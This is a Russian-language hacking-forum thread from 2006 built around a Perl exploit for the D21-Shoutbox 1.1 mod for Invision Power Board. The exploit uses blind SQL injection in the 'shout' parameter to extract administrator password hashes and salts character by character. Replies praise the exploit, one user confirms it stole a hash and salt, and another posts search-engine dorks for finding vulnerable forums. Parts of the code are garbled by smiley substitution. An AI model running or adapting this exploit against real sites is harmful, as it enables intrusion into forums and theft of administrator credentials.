Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
04.11.2006, 12:01
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
D21-Shoutbox 1.1
D21-Shoutbox 1.1
Уязвими параметр shout.
Вот сплойт
#!/usr/bin/perl
########################################
# Coded by k1b0rg (768620) #
# shout.pl <site> <id> #
# shout.pl http://site.ru/forum/ 1 #
# shout.pl http://site.ru/forum/ 1,2 #
########################################
use LWP::UserAgent;
my $browser = LWP::UserAgent->new();
$site=$ARGV[0];
my $admins_id=$ARGV[1];
@admin=split(',',$admins_id);
my $res=$browser->get($site.'index.php?act=Shoutbox');
if($res->content=~/act=Shoutbox&shout=(\d+)/is)
{
my $idshout=$1;
syswrite STDOUT, "\n".'Shout box found!';
my $res=$browser->get($site.'index.php?act=Shoutbox&shout='.$idshou t.'\'');
if($res->content =~ /(SQL error|mySQL query error)/is)
{
syswrite STDOUT, "\n".'Mode(sql) shoutbox: [OK]';
if($res->content =~ /FROM (.*?)shoutbox/i)
{
$prefix_bd=$1;
syswrite STDOUT, "\n".'prefix_bd_shoutbox: ['.$prefix_bd.']';
&shout_sql($idshout);
}
}
else { syswrite STDOUT, "\n".'NOT Vulnerebility';}
}
else { syswrite STDOUT, "\n".'Shout box mode NOT FOUND!';}
sub shout_sql($)
{
my $idshout=$_[0];
foreach my $id(@admin)
{
syswrite STDOUT, "\n".'Admin id ('.$id.') : [';
for($i=1;$i<=32;$i++)
{
&position_shout(97,102,$i,$id,$idshout,'pass') if (!&position_shout(48,57,$i,$id,$idshout,'pass'))
}
syswrite STDOUT, ':';
for($i=1;$i<=5;$i++)
{
&position_shout(33,126,$i,$id,$idshout,'salt');
}
syswrite STDOUT, ']';
}
}
sub position_shout($$$$$$)
{
my ($j,$max,$i,$mid,$idshout,$label)=@_;
while($j<=$max)
{
if(&scan_shout($site,$j,$mid,$i,$idshout,$label)) { syswrite STDOUT, chr($j); return 1;}
$j++;
}
}
sub scan_shout($$$$$)
{
my ($site,$num,$mid,$pos,$idshout,$label)=@_;
my $field=($label eq 'pass')?('converge_pass_hash')  'converge_pass_sal t');
my $res=$browser->get($site.'index.php?act=Shoutbox&shout='.$idshou t.'+and(ascii(substring((select+'.$field.'+from+'. $prefix_bd.'members_converge+where+converge_id='.$ mid.'),'.$pos.',1))='.$num.')/*');
return 1 if($res->content=~/var\ssids\s=\s\[(\d+)\];/is);
} |
|
|
05.11.2006, 05:40
|
|
Познающий
Регистрация: 10.10.2006
Сообщений: 65
Провел на форуме:
215903
Репутация:
20
|
|
Бля, незнаю что жто такое ))))))))))), но все равно плюс!!! ))))
|
|
|
|
06.11.2006, 14:29
|
|
Banned
Регистрация: 06.03.2005
Сообщений: 1,645
Провел на форуме:
7298807
Репутация:
901
|
|
Ну красиво!, красиво  . На перле, сплоит, да под форум который фиг найдешь ищё .
Как всегда, киборг радует! ) |
|
|
|
06.11.2006, 14:32
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
Ну красиво!, красиво . На перле, сплоит, да под форум который фиг найдешь ищё .
Как всегда, киборг радует! )
типа мало Ipb шек ? =))
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
06.11.2006, 14:54
|
|
Banned
Регистрация: 22.08.2006
Сообщений: 608
Провел на форуме:
6144796
Репутация:
1095
|
|
риспект!
кстати, под эту же версию уже был сплоит, если мне не отнимает память там скуль в параметре id была (точно не помню)..
Последний раз редактировалось Digimortal; 06.11.2006 в 15:54..
|
|
|
|
06.11.2006, 15:50
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
Слайдер, протезы глаз надеваются зрачками наружу. и когда куришь надо сначала зятгиватся, держать дым в себе, а потом выдыхать. А не так как ты, куришь сначала бумагу, потом нюхаешь травку, и зализываешь клеем.
D21-Shoutbox 1.1 это мод для ipb
|
|
|
|
06.11.2006, 20:39
|
|
Участник форума
Регистрация: 11.03.2006
Сообщений: 119
Провел на форуме:
1166355
Репутация:
177
|
|
Я в легком ахтунге. Сплойт заработал и выдал мне хеш+сальт. Но у него ушло на это 1 час и сожрало больше 30 метров траффа.
k1b0rg - так и должен работать или это такая своеобразная защита от умных пацанов |
|
|
|
06.11.2006, 21:25
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
так и должен работать. Просто бага такая. Час ты конечно загнул, у меня 25 минут он работает. 7 минут хеш, и 18 - соль
|
|
|
|
07.11.2006, 12:52
|
|
Познающий
Регистрация: 02.06.2006
Сообщений: 66
Провел на форуме:
870911
Репутация:
69
|
|
Респект Киборгу! Сплойт гут.
зы: для тех кто не понял: сплойт нужно подправить, а то там пару символов в смайлик преобразуется вот в такой .
для тех кто не может найти уязвимый форум: google intitle D21-Shoutbox
или allinurl:index.php?act=Shoutbox
Последний раз редактировалось bandera; 07.11.2006 в 13:33..
|
|
|
|
07.11.2006, 13:29
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
эм )))))
а чо нужно подправить то? я вроде выложил рабочий )))))))
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
